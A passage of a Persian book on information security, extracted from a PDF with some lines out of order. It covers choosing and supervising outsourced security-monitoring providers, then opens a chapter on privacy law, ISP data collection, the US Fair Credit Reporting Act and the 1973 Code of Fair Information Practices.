‫ﺞ ﺧــﻮﺩ ﺭﻓــﻊ ﻛﻨــﺪ ﻭ ﺩﺭ ﻋــﻴﻦ ﺣــﺎﻝ ﺳــﺎﺯﮔﺎﺭﻱ ﺁﻥ‬
‫ﺭﺍﻳـ ﹺ‬
‫ﻣﺤﺼﻮﻻﺕ ﺑﺎ ﻧﺴﺨﻪﻫﺎﻱ ﻗﺒﻠﻲ ﺭﺍ ﻧﻴﺰ ﺣﻔﻆ ﻧﻤﺎﻳﺪ‪.‬‬
‫‪.۴‬‬
‫ﺍﻳﻨﻜﻪ ﻓﻨﺎﻭﺭﻱ ﺷﺮﻛﺖ ﻣﻮﺭﺩ ﻧﻈﺮ ﻭﺍﻗﻌﹰﺎ ﺑـﻪ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ‬
‫ﺑﺮﻭﺯ ﻣﺸﻜﻼﺕ ﻛﻤﻚ ﻣﻲﻛﻨﺪ ﻳﺎ ﺑﻌﺪ ﺍﺯ ﻭﻗﻮﻉ ﻣﺸﻜﻞ ﭘﻲ‬
‫ﺑﻪ ﻭﺟﻮﺩ ﺁﻥ ﻣﻲﺑﺮﺩ ﺭﺍ ﺑﻪ ﺩﻗﺖ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﺩﻫﻴﺪ‪.‬‬
‫ﺧﺪﻣﺎﺕ ﻧﻈﺎﺭﺕ‬
‫ﺍﮔﺮ ﻭﺿﻌﻴﺖ ﻋﻤﻮﻣﻲ ﭘﺎﻳﺪﺍﺭ ﺑﺎﺷﺪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺧـﺪﻣﺎﺕ ﻧﻈـﺎﺭﺕ ﻭ‬
‫ﻛﻨﺘﺮﻝ ﺳﺮﻣﺎﻳﻪ ﮔﺬﺍﺭﻱ ﺧﻮﺑﻲ ﻣﺤﺴﻮﺏ ﻣﻲﺷﻮﺩ‪ .‬ﺧﺪﻣﺎﺕ ﺭﺍﻳﺠﻲ‬
‫ﻛﻪ ﺑﺼﻮﺭﺕ ﺭﻭﺯﻣﺮﻩ ﺍﺭﺍﺋﻪ ﻣﻲﺷﻮﻧﺪ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ ﺭﺍﻫﺒﺮﻱ ﻣﺤﻞ ﻛﺎﺭ‬
‫ﭘﻴﻤﺎﻧﻜﺎﺭﺍﻥ‪ ،‬ﻧﻈﺎﺭﺕ ﺑﺮ ﺍﻣﻨﻴﺖ ﻣﺤﻞ ﻛﺎﺭ ﻭ ﺧﺎﺭﺝ ﺍﺯ ﺁﻥ‪ ،‬ﻭﺍﻛـﻨﺶ‬
‫ﺑﻪ ﺭﺧﺪﺍﺩ ﻭ ﭘﻴﮕﺮﺩ ﻗـﺎﻧﻮﻧﻲ )ﺩﺭﺻـﻮﺭﺕ ﺩﺭﺧﻮﺍﺳـﺖ( ﻭ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ‬
‫ﻳﻚ ﺳﺎﻳﺖ ﺟﺎﻳﮕﺰﻳﻦ ﺑـﺮﺍﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﺩﺭ ﻭﻗـﺖ ﺧﺮﺍﺑـﻲ ﺳـﺎﻳﺖ‬
‫ﺍﺻﻠﻲ‪ .‬ﺍﻣﺎ ﻋﻼﻭﻩ ﺑﺮ ﻧﮕﺮﺍﻧﻲ ﺩﺭ ﺧﺼﻮﺹ ﺍﻓـﺮﺍﺩﻱ ﻛـﻪ ﺧـﺪﻣﺎﺕ‬
‫ﻣــﺸﺎﻭﺭﻩﺍﻱ ﺍﺭﺍﺋــﻪ ﻣــﻲﺩﻫﻨــﺪ ﺑﺎﻳــﺪ ﻣﺮﺍﻗــﺐ ﺳــﺨﺖﺍﻓﺰﺍﺭﻫــﺎ ﻭ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﺓ ﺁﻧﻬﺎ ﻫﻢ ﺑﺎﺷﻴﺪ‪.‬‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺷﺮﻛﺘﻬﺎﻱ ﺧﺪﻣﺎﺕ ﻧﻈـﺎﺭﺗﻲ ﻭ ﻭﺍﻛـﻨﺶ ﺑـﻪ ﺭﺧـﺪﺍﺩ‪،‬‬
‫ﺳﺨﺖﺍﻓﺰﺍﺭﻫﺎ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻳﻲ ﺩﺍﺭﻧﺪ ﻛﻪ ﻣﻲﺧﻮﺍﻫﻨﺪ ﺭﻭﻱ ﺷـﺒﻜﺔ‬
‫ﺷﻤﺎ ﻧﺼﺐ ﻛﻨﻨﺪ‪ .‬ﺁﻧﻬﺎ ﺍﺯ ﺍﻳﻨﻜﺎﺭ ﺑﺮﺍﻱ ﺟﻤﻊﺁﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻻﺯﻡ‬
‫ﺟﻬــﺖ ﺑــﺎﺯﺑﻴﻨﻲ ﻭ ﺗﻐﻴﻴــﺮ ﺗﻨﻈﻴﻤــﺎﺕ ﺍﻣﻨﻴﺘــﻲ ﺳﻴــﺴﺘﻢ ﺍﺳــﺘﻔﺎﺩﻩ‬
‫ﻣﻲﻧﻤﺎﻳﻨﺪ‪ .‬ﺑﺎﻳﺪ ﺑﺎ ﺍﻳﻦ ﻓﻨﺎﻭﺭﻱ ﺑﺮﺧﻮﺭﺩ ﻣﺤﺘﺎﻃﺎﻧﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻴﺪ؛‬
‫ﭼﺮﺍﻛﻪ ﺩﺭ ﻣﻮﻗﻌﻴﺘﻲ ﻣﺠﺎﺯ ﻭ ﺩﺭﻭﻥ ﺩﺍﻳﺮﺓ ﺍﻣﻨﻴﺘﻲ ﺷﻤﺎ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ‬
‫ﺍﺳﺖ‪:‬‬
‫‪.۱‬‬
‫ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﺍﺯ ﻋﻤﻠﻜﺮﺩ ﺍﺟـﺰﺍﻱ ﻣﺨﺘﻠـﻒ ﺷـﺒﻜﻪ ﻭ‬
‫ﺗﺠﻬﻴــﺰﺍﺕ ﺁﻥ ﺗﻮﺿــﻴﺤﺎﺕ ﻛﺎﻣــﻞ ﻭ ﻛﺘﺒــﻲ ﺩﺭﻳﺎﻓــﺖ‬
‫ﻣﻲﻛﻨﻴﺪ‪ .‬ﻫﻤﭽﻨﻴﻦ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻـﻞ ﻛﻨﻴـﺪ ﻛـﻪ ﻣﺘﻮﺟـﻪ‬
‫ﻣﻲﺷﻮﻳﺪ ﺁﻥ ﺍﺟﺰﺍ ﭼﮕﻮﻧﻪ ﻛﺎﺭ ﻣـﻲﻛﻨﻨـﺪ ﻭ ﻫﺮﻳـﻚ ﭼـﻪ‬
‫ﻛﻼﻡ ﺁﺧﺮ ﭘﻴﺮﺍﻣﻮﻥ ﻣﻨﺎﺑﻊ ﺧﺎﺭﺝ ﺍﺯ ﺳﺎﺯﻣﺎﻥ‬
‫ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﻛﺎﺭﺷﻨﺎﺳــﺎﻥ ﺑﻴﺮﻭﻧــﻲ ﺭﺍﻩ ﺧــﻮﺑﻲ ﺑــﺮﺍﻱ ﺗــﺄﻣﻴﻦ‬
‫ﺣﻔﺎﻇﺘﻬــﺎﻱ ﻻﺯﻡ ﻣــﻲﺑﺎﺷــﺪ‪ .‬ﻣﻬﺎﺭﺗﻬــﺎﻳﻲ ﻛــﻪ ﺑــﺮﺍﻱ ﺗــﺪﻭﻳﻦ‬
‫ﺳﻴﺎﺳﺘﻬﺎ‪ ،‬ﻧﻈﺎﺭﺕ ﺑﺮ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﻣﻬـﺎﺟﻢﻳـﺎﺏ ﻭ ﺩﻳـﻮﺍﺭﻩﻫـﺎﻱ‬
‫ﺁﺗﺶ‪ ،‬ﻭ ﺁﻣﺎﺩﻩﺳﺎﺯﻱ ﻭ ﺍﺟﺮﺍﻱ ﺑﺮﻧﺎﻣﺔ ﺗﺮﻣﻴﻢ ﺍﺯ ﺳﻮﺍﻧﺢ ﻻﺯﻡ ﺍﺳﺖ‬
‫ﺑﻌﻀﹰﺎ ﺑﺴﻴﺎﺭ ﺗﺨﺼﺼﻲ ﻭ ﻧﺎﻣﺘﻌﺎﺭﻑ ﻫـﺴﺘﻨﺪ ﻭ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺩﺭ‬
‫ﻣﻴﺎﻥ ﻛﺎﺭﻣﻨﺪﺍﻥ ﻓﻌﻠـﻲ ﺳـﺎﺯﻣﺎﻥ ﻭﺟـﻮﺩ ﻧﺪﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ‪ .‬ﺍﻧﺠـﺎﻡ‬
‫ﺻﺤﻴﺢ ﻫﻤﻴﻦ ﻛﺎﺭﻫﺎﺳﺖ ﻛﻪ ﺩﺭ ﺗﺪﺍﻭﻡ ﻳﻚ ﺗﺠـﺎﺭﺕ ﻳـﺎ ﺧﺎﺗﻤـﺔ‬
‫ﺁﻥ ﺑﻪ ﻋﻠﺖ ﺑﺮﻭﺯ ﻋﻴﺐ ﻭ ﻧﻘﺼﻬﺎﻱ ﻣﺨﺘﻠﻒ‪ ،‬ﺗﻌﻴﻴﻦﻛﻨﻨﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﺩﺭ ﻋﻴﻦ ﺣﺎﻝ ﺣﻮﺯﺓ ﻣﺸﺎﻭﺭﺓ ﺍﻣﻨﻴﺖ ﺑﺎ ﺧﻄﺮ ﺭﻭﺑﺮﻭ ﺍﺳﺖ؛ ﭼﺮﺍﻛـﻪ‬
‫ﭘﺪﻳﺪﻩﺍﻱ ﺟﺪﻳﺪ ﺍﺳﺖ ﻭ ﺑﺨﻮﺑﻲ ﺩﺭﻙ ﻧﻤﻲ ﺷﻮﺩ‪ .‬ﺍﻓﺮﺍﺩ ﺷﺎﺭﻻﺗﺎﻥ‪،‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫‪١٧٣‬‬
‫ﺣﻘﻪﺑﺎﺯ‪ ،‬ﺑﻲﺗﺠﺮﺑﻪ ﻭ ﺗﺎﺯﻩﻛﺎﺭ ﻫﻤﻴﺸﻪ ﻭﺟﻮﺩ ﺩﺍﺭﻧـﺪ ﻭ ﺩﺭ ﺑـﺴﻴﺎﺭﻱ‬
‫ﻣﻮﺍﺭﺩ ﻧﻤﻲﺗﻮﺍﻥ ﺁﻧﻬﺎ ﺭﺍ ﺍﺯ ﺍﻓﺮﺍﺩ ﻗﺎﺑﻞ ﺍﻋﺘﻤﺎﺩ ﻭ ﺣﺮﻓـﻪﺍﻱ ﻛـﻪ ﺩﺭ‬
‫ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﻛـﺎﺭ ﻣـﻲﻛﻨﻨـﺪ ﺗﻤﻴـﺰ ﺩﺍﺩ‪ .‬ﺍﻟﺒﺘـﻪ ﮔﺬﺷـﺖ ﺯﻣـﺎﻥ ﺑـﻪ‬
‫ﺗﺸﺨﻴﺺ ﻣﺴﺎﺋﻞ ﻛﻤﻚ ﻣﻲﻛﻨﺪ‪ ،‬ﺍﻣﺎ ﺍﻧﺘﺨـﺎﺏ ﺻـﺤﻴﺢ ﺩﺭ ﮔـﺎﻡ‬
‫ﺍﻭﻝ ﺑﻪ ﻣﻘﺪﺍﺭﻱ ﺗﻼﺵ ﻭ ﺳﺮﻣﺎﻳﻪ ﻧﻴﺎﺯ ﺩﺍﺭﺩ‪.‬‬
‫ﻳﻚ ﺭﺍﻩ ﻛﻪ ﺑﺮﺍﻱ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﺷﻤﺎ ﺍﺯ ﺭﺷﺪ ﺍﻳﻦ ﺣﻮﺯﻩ ﭘﻴـﺸﻨﻬﺎﺩ‬
‫ﻣﻲﺷﻮﺩ ﺩﻭﺭﻱ ﺟـﺴﺘﻦ ﺍﺯ ﺍﻧﻌﻘـﺎﺩ ﻗﺮﺍﺭﺩﺍﺩﻫـﺎﻱ ﻃـﻮﻻﻧﻲ ﻣـﺪﺕ‬
‫ﺍﺳﺖ؛ ﻣﮕﺮ ﺁﻧﻜﻪ ﺗﺄﻣﻴﻦﻛﻨﻨﺪﺓ ﺧﺪﻣﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺷﻤﺎ ﺑـﺴﻴﺎﺭ ﻣـﻮﺭﺩ‬
‫ﺍﻃﻤﻴﻨﺎﻥ ﺑﺎﺷﺪ ﻭ ﻫﻤﻮﺍﺭﻩ ﺧﻮﺩ ﺭﺍ ﺑـﻪﺭﻭﺯ ﻧﮕـﻪ ﺩﺍﺭﺩ‪ .‬ﭼـﺸﻢﺍﻧـﺪﺍﺯ‬
‫ﻣﺸﺎﻭﺭﺓ ﺍﻣﻨﻴﺖ ﺩﺭ ﭼﻨﺪ ﺳﺎﻝ ﺁﻳﻨﺪﻩ ﻣﺴﺘﻌﺪ ﺗﻐﻴﻴﺮﺍﺕ ﺯﻳﺎﺩ ﺍﺳﺖ‪ ،‬ﻭ‬
‫ﺍﮔﺮ ﺩﺭ ﻫﺮ ﺯﻣﺎﻥ ﺑﺘﻮﺍﻧﻴﺪ ﮔﺰﻳﻨﻪﻫﺎﻱ ﻣﺨﺘﻠﻔﻲ ﻛـﻪ ﻫﻤـﺮﺍﻩ ﺑـﺎ ﺁﻥ‬
‫ﺗﻐﻴﻴﺮﺍﺕ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻳﻨﺪ ﺭﺍ ﺍﻧﺘﺨﺎﺏ ﻛﻨﻴـﺪ ﻣﻨـﺎﻓﻊ ﺧﻮﺩﺗـﺎﻥ ﺑﻬﺘـﺮ‬
‫ﺗﺄﻣﻴﻦ ﺧﻮﺍﻫﺪ ﺷﺪ‪.‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‬
‫ﺳﺮﺍﻧﺠﺎﻡ ﻋﻠﻴﺮﻏﻢ ﺍﻳﻨﻜﻪ ﺷﻤﺎ ﺑـﺮﺍﻱ ﺩﺭﻳﺎﻓـﺖ ﺧـﺪﻣﺎﺗﻲ ﻗـﺮﺍﺭﺩﺍﺩ‬
‫ﺑﺴﺘﻪﺍﻳﺪ ﻛﻪ ﺩﺭ ﻗﺒﺎﻝ ﺍﺳﺘﻔﺎﺩﺓ ﻧﺎﺩﺭﺳﺖ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻳﺘﺎﻥ ﺑﺮ ﺁﻧﻬـﺎ‬
‫ﻧﻈﺎﺭﺕ ﻛﻨﺪ‪ ،‬ﺍﻣـﺎ ﻫﻮﺷـﻴﺎﺭﻱ ﻭ ﻣﺮﺍﻗﺒـﺖ ﺧـﻮﺩ ﺭﺍ ﻧﻴـﺰ ﺍﺯ ﺩﺳـﺖ‬
‫ﻧﺪﻫﻴﺪ‪ :‬ﺗﺎ ﺁﻧﺠﺎ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺮﺍﻗـﺐ ﺑﺎﺷـﻴﺪ ﻭ ﺳﻴـﺴﺘﻤﻬﺎﻱ‬
‫ﺧﻮﺩ ﺭﺍ ﻗﻮﻳﺘﺮ ﻛﻨﻴﺪ‪ .‬ﻫﻤﭽﻨﺎﻧﻜﻪ ﺗﻬﺪﻳﺪﺍﺕ ﭘﻴﭽﻴﺪﻩﺗـﺮ ﻣـﻲﺷـﻮﻧﺪ‪،‬‬
‫ﻣﺪﺍﻓﻌﻴﻦ ﻭ ﻛﺴﺎﻧﻴﻜﻪ ﻣﺴﺘﻌﺪ ﻗﺮﺑﺎﻧﻲﺷﺪﻥ ﻫﺴﺘﻨﺪ ﻧﻴﺰ ﺑﺎﻳﺪ ﺗﺮﻗـﻲ‬
‫ﻭ ﭘﻴﺸﺮﻓﺖ ﻧﻤﺎﻳﻨﺪ‪.‬‬
‫‪١٧٥‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫ﻓﺼﻞ ﻫﺸﺘﻢ‬
‫ﻗﺎﻧﻮﻥﻧﻮﻳﺴﻲ‪،‬‬
‫ﺗﺪﻭﻳﻦ ﺁﻳﻴﻦﻧﺎﻣﻪﻫﺎﻱ ﺩﻭﻟﺘﻲ‪،‬‬
‫ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ‬
‫ﺑﺎﻳﺪ ﺍﺑﺘﺪﺍ ﺍﺯ ﺭﺍﻳﺎﻧﺔ ‪ISP‬ﻫﺎ ﺑﮕﺬﺭﺩ‪ISP .‬ﻫﺎ ﻫﻤﭽﻨﻴﻦ ﻣـﻲﺗﻮﺍﻧﻨـﺪ‬
‫ﺏ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﺓ ﻛﺎﺭﺑﺮﺍﻥ ﺧﻮﺩ ﻭ ﺣﺘﻲ ﻣﻘﺎﻻﺗﻲ ﻛﻪ‬
‫ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭ ﹺ‬
‫ﻣــﻮﺭﺩ ﻣﻄﺎﻟﻌــﻪ ﻗــﺮﺍﺭ ﺩﺍﺩﻩﺍﻧــﺪ ﺭﺍ ﺗــﺸﺨﻴﺺ ﺩﻫﻨــﺪ‪ .‬ﺁﻧﻬــﺎ ﺣﺘــﻲ‬
‫ﻲ ﺍﻓـﺮﺍﺩ ﺭﺍ ﺑـﺮ ﺣـﺴﺐ ﻛﻠﻤـﺎﺕ‬
‫ﻣﻲﺗﻮﺍﻧﻨﺪ ﻧﺎﻣﻪﻫـﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـ ﹺ‬
‫ﻛﻠﻴﺪﻱ ﺑﻜﺎﺭﺭﻓﺘﻪ ﺩﺭ ﻣﺘﻦ ﺁﻧﻬـﺎ ﺗﺤﻠﻴـﻞ ﻧﻤﺎﻳﻨـﺪ‪ .‬ﺑـﺎ ﺭﺩﮔﻴـﺮﻱ ﻭ‬
‫ﻼ ﺁﻳـﺎ‬
‫ﺗﺤﻠﻴﻞ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ‪ ،‬ﻳﻚ ‪ ISP‬ﻣﻲﺗﻮﺍﻧﺪ ﺑﮕﻮﻳﺪ ﻛﻪ ﻣـﺜ ﹰ‬
‫ﻛﺎﺭﺑﺮﺍﻧﺶ ﺑﻪ ﺳﻔﺮ ﺑﺎ ﻗـﺎﻳﻖ ﻋﻼﻗﻤﻨـﺪ ﻫـﺴﺘﻨﺪ ﻳـﺎ ﺑـﻪ ﺳـﻔﺮ ﺑـﺎ‬
‫ﺍﺗﻮﻣﺒﻴﻞ؛ ﺑﻪ ﻣﺪ ﺍﻫﻤﻴﺖ ﻣﻲﺩﻫﻨﺪ ﻳﺎ ﺧﻴﺮ؛ ﻭ ﺁﻳﺎ ﻧﺴﺒﺖ ﺑﻪ ﺩﺭﻣـﺎﻥ‬
‫ﺑﻴﻤﺎﺭﻱ ﺧﺎﺻﻲ ﻋﻼﻗﻪ ﻧﺸﺎﻥ ﻣﻲﺩﻫﻨﺪ ﻳﺎ ﻧﻪ‪.‬‬
‫ﺳﻴﺎﺳﺘﻬﺎﻱ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ‬
‫ﻛﻠﻴﺎﺕ‬
‫ﺭﻭﺍﺑﻂ ﺗﺠﺎﺭﺕ ﻭ ﻣﺸﺘﺮﻱ ﺩﺭ ﺩﻧﻴﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ‬
‫ﺑﺎﺯﺭﮔﺎﻧﺎﻥ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺍﻃﻼﻋﺎﺕ ﺯﻳﺎﺩﻱ ﺍﺯ ﻣـﺸﺘﺮﻳﺎﻥ ﺧـﻮﺩ ﺑﺪﺳـﺖ‬
‫ﻣﻲﺁﻭﺭﻧﺪ‪ .‬ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﻓﺮﻭﺵ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﻣـﻲﺩﺍﻧـﺪ ﺷـﻤﺎ ﺩﺭﺣـﺎﻝ‬
‫ﺑﺮﺭﺳﻲ ﻛﺪﺍﻡ ﻣﺤﺼﻮﻝ ﻫـﺴﺘﻴﺪ؛ ﻛـﺪﺍﻡ ﻣﺤـﺼﻮﻝ ﺭﺍ ﺑـﻪ ﻛـﺎﺭﺕ‬
‫ﺧﺮﻳﺪ ﺧﻮﺩ ﻣﻲﺍﻓﺰﺍﻳﻴﺪ ﺍﻣﺎ ﭘﺲ ﺍﺯ ﻣﺪﺗﻲ ﺣﺬﻑ ﻣﻲﻛﻨﻴﺪ؛ ﻭ ﻛـﺪﺍﻡ‬
‫ﻣﺤــﺼﻮﻝ ﺭﺍ ﻧﻬﺎﻳﺘـﹰﺎ ﺑــﺼﻮﺭﺕ ﺍﻳﻨﺘﺮﻧﺘــﻲ ﻣــﻲﺧﺮﻳــﺪ‪ .‬ﺑﺎﺯﺭﮔﺎﻧــﺎﻥ‬
‫ﺍﻳﻨﺘﺮﻧﺘﻲ ﻫﻤﭽﻨﻴﻦ ﻣﻲﺩﺍﻧﻨﺪ ﻫﻨﮕﺎﻡ ﺧﺮﻳﺪ ﺩﺭ ﺧﺎﻧﻪ ﻫـﺴﺘﻴﺪ ﻭ ﻳـﺎ‬
‫ﺳ ﹺﺮ ﻛﺎﺭ‪ ،‬ﻭ ﺍﮔﺮ ﺑﺨﻮﺍﻫﻨﺪ ﻣﻲﺗﻮﺍﻧﻨـﺪ ﺍﺯ ﺑﺎﻗﻴﻤﺎﻧـﺪﺓ ﺍﻋﺘﺒـﺎﺭ ﻛـﺎﺭﺕ‬
‫ﺧﺮﻳﺪ ﺷﻤﺎ ﻧﻴﺰ ﻣﻄﻠـﻊ ﺷـﻮﻧﺪ‪ .‬ﻋـﻼﻭﻩ ﺑـﺮ ﺁﻥ ﺑـﺮﺧﻼﻑ ﺩﻧﻴـﺎﻱ‬
‫ﻏﻴﺮﺍﻳﻨﺘﺮﻧﺘﻲ‪ ،‬ﻳﻚ ﺑﺎﺯﺭﮔﺎﻥ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻣﻲﺗﻮﺍﻧﺪ ﻣﻴﺎﻥ ﺳﺎﺑﻘﺔ ﺧﺮﻳـﺪ‬
‫ﻭ ﻋﺎﺩﺗﻬﺎﻱ ﮔﺮﺩﺵ ﺷﻤﺎ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﻧﻴﺰ ﺍﺭﺗﺒﺎﻁ ﺑﺮﻗﺮﺍﺭ ﻛﻨﺪ ﻭ ﺑـﺎ‬
‫ﺑﺮﻗﺮﺍﺭﻱ ﭼﻨﻴﻦ ﺭﻭﺍﺑﻄﻲ ﻣﻴﺎﻥ ﺩﺍﺩﻩﻫﺎﻱ ﻣﺨﺘﻠﻒ ﻃﻴﻒ ﻭﺳﻴﻌﻲ ﺍﺯ‬
‫ﻣﺸﺘﺮﻳﺎﻥ‪ ،‬ﺑﻪ ﻳﻜﺴﺮﻱ ﺍﻟﮕﻮﻫﺎﻱ ﺍﺭﺯﺷﻤﻨﺪ ﺭﻓﺘﺎﺭﻱ ﭘﻲ ﺑﺒﺮﺩ‪.‬‬
‫‪ISP‬ﻫــﺎ ﻗﺎﺩﺭﻧــﺪ ﺍﺯ ﺍﻳــﻦ ﻫــﻢ ﺑﻴــﺸﺘﺮ ﺩﺭ ﻣــﻮﺭﺩ ﻣــﺸﺘﺮﻱ ﺧــﻮﺩ‬
‫ﺍﻃﻼﻋﺎﺕ ﻛﺴﺐ ﻛﻨﻨﺪ؛ ﭼﺮﺍﻛﻪ ﻫﺮﺁﻧﭽﻪ ﻛﺎﺭﺑ ﹺﺮ ﺍﻳﻨﺘﺮﻧﺖ ﻣـﻲﺑﻴﻨـﺪ‬
‫‪115 Cyberspace‬‬
‫ﺩﺭ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺣﻘﻮﻕ ﻣﺼﺮﻑﻛﻨﻨﺪﻩ ﺑﺮﺍﻱ ﺑﺎﺭ ﺍﻭﻝ ﺩﺭ ﻗـﺎﻧﻮﻥ‬
‫ﮔﺰﺍﺭﺵ ﺍﻋﺘﺒﺎﺭ ﺑﺎﺯﺍﺭ‪) ١١٦‬ﻣﺼﻮﺏ ﺳﺎﻝ ‪ (۱۹۷۰‬ﺻﺮﺍﺣﺘﹰﺎ ﻣـﻮﺭﺩ ﺍﺷـﺎﺭﻩ‬
‫ﻗﺮﺍﺭ ﮔﺮﻓﺖ‪ .‬ﺍﻳﻦ ﻗﺎﻧﻮﻥ ﺣﻘﻮﻕ ﺍﺳﺎﺳﻲ ﻣـﺼﺮﻑﻛﻨﻨـﺪﮔﺎﻥ ﺭﺍ ﺑـﻪ‬
‫ﺭﺳﻤﻴﺖ ﻣﻲﺷﻨﺎﺧﺖ؛ ﺣﻘﻮﻗﻲ ﭼﻮﻥ ﺣـﻖ ﻣﻼﺣﻈـﺔ ﮔﺰﺍﺭﺷـﻬﺎﻱ‬
‫ﺍﻋﺘﺒﺎﺭﻱ ﻫﺮ ﻣﺼﺮﻑﻛﻨﻨﺪﻩ ﺗﻮﺳﻂ ﺧﻮﺩ ﺍﻭ‪ ،‬ﺣﻖ ﺍﻃـﻼﻉ ﺍﺯ ﺍﻳﻨﻜـﻪ‬
‫ﭼﻪ ﻛﺴﺎﻧﻲ ﮔﺰﺍﺭﺷﺎﺕ ﻣﺮﺑﻮﻁ ﺑـﻪ ﻭﻱ ﺭﺍ ﻣـﻲﺑﻴﻨﻨـﺪ‪ ،‬ﺣـﻖ ﺍﻟـﺰﺍﻡ‬
‫ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺗﻬﻴﻪﻛﻨﻨﺪﺓ ﮔﺰﺍﺭﺷﺎﺕ ﺑﻪ ﺗﺤﻘﻴﻖ ﺩﺭ ﻣﻮﺭﺩ ﺍﺷـﺘﺒﺎﻫﺎﺕ‬
‫ﻛﺸﻒﺷﺪﻩ ﺗﻮﺳﻂ ﻣﺼﺮﻑﻛﻨﻨﺪﮔﺎﻥ‪ ،‬ﻭ ﺣﻖ ﺍﻟـﺰﺍﻡ ﺳـﺎﺯﻣﺎﻧﻬﺎ ﺑـﻪ‬
‫ﺍﺿﺎﻓﻪﻛﺮﺩﻥ ﻳﻚ ﺍﻇﻬﺎﺭﻳﻪ ﺍﺯ ﻃـﺮﻑ ﻣـﺸﺘﺮﻳﺎﻥ ﺑـﻪ ﮔﺰﺍﺭﺷـﻬﺎﻱ‬
‫ﻣــﻮﺭﺩ ﻣﻨﺎﻗــﺸﻪ‪ .‬ﺩﺭ ﺳــﺎﻝ ‪ - ۱۹۷۳‬ﺩﺭ ﺩﻭﺭﻩﺍﻱ ﻛــﻪ ﺩﺍﺩﻩﻫــﺎﻱ‬
‫ﺷﺨﺼﻲ ﺑﻴﺶ ﺍﺯ ﭘﻴﺶ ﺭﻭﻱ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﻗـﺮﺍﺭ ﺩﺍﺷـﺘﻨﺪ ‪ -‬ﺑـﺮﺍﻱ‬
‫ﺍﺣﻘﺎﻕ ﺣﻘﻮﻕ ﻣﺼﺮﻑ ﻛﻨﻨﺪﻩ‪ ،‬ﺁﻳﻴﻦﻧﺎﻣـﺔ ﺭﺍﻫﻜﺎﺭﻫـﺎﻱ ﺍﻃﻼﻋـﺎﺕ‬
‫ﺑﺎﺯﺍﺭ‪ ١١٧‬ﺍﺑﻼﻍ ﺷﺪ‪.‬‬
‫ﺁﻳﻴﻦﻧﺎﻣﺔ ﺭﺍﻫﻜﺎﺭﻫﺎﻱ ﺍﻃﻼﻋﺎﺕ ﺑﺎﺯﺍﺭ‬
‫‪١١٨‬‬
‫ﺁﻳﻴﻦﻧﺎﻣﺔ ﺭﺍﻫﻜﺎﺭﻫﺎﻱ ﺍﻃﻼﻋﺎﺕ ﺑﺎﺯﺍﺭ ﺑﺮ ﭘﻨﺞ ﺍﺻﻞ ﺍﺳﺘﻮﺍﺭ ﺍﺳﺖ‪:‬‬
‫•‬
‫ﻖ ﺩﺍﺩﻩ ﻫﺎﻱ ﺷﺨﺼﻲ ﻧﺒﺎﻳـﺪ‬
‫ﻱ ﺳﻮﺍﺑ ﹺ‬
‫ﻫﻴﭻ ﺳﻴﺴﺘ ﹺﻢ ﻧﮕﻬﺪﺍﺭ ﹺ‬
‫ﺑﺼﻮﺭﺕ ﻣﺨﻔﻲ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪.‬‬
‫‪116 Fair Credit Reporting Act‬‬
‫‪117 Code of Fair Information Practices‬‬
‫‪ ۱۱۸‬ﻣﻨﺒﻊ‪ :‬ﻭﺯﺍﺭﺕ ﺑﻬﺪﺍﺷﺖ‪ ،‬ﺁﻣﻮﺯﺵ ﻭ ﺭﻓﺎﻩ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ‬
